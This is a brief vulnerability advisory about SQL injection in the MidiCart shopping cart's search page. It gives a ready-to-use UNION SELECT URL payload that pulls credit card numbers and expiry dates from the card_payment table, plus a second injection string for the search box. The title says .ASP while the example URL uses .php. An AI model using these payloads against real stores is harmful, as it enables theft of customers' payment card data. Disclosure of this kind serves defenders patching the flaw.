MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability

MidiCart ASP Search_List.ASP Searchstring Parameter SQL Injection Vulnerability

The following example was provided:

http://[victim]/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*

The issue can also be reproduced by submitting the following string into the search box:

1' union select * from products'